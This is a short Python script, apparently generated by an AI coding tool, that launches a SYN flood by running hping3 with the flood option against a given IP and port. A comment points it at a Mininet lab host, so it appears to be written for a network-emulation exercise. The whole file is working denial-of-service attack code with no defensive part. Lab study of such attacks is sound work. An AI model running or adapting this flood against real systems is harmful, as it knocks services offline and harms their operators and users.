# Generated by Antigravity
import os
import sys

def launch_syn_flood(target_ip, target_port):
    # -S: SYN flag
    # --flood: send as fast as possible
    cmd = f"hping3 -S --flood -p {target_port} {target_ip}"
    os.system(cmd)

if __name__ == "__main__":
    # In Mininet, h1 usually gets the IP 10.0.0.1
    launch_syn_flood("10.0.0.1", 80)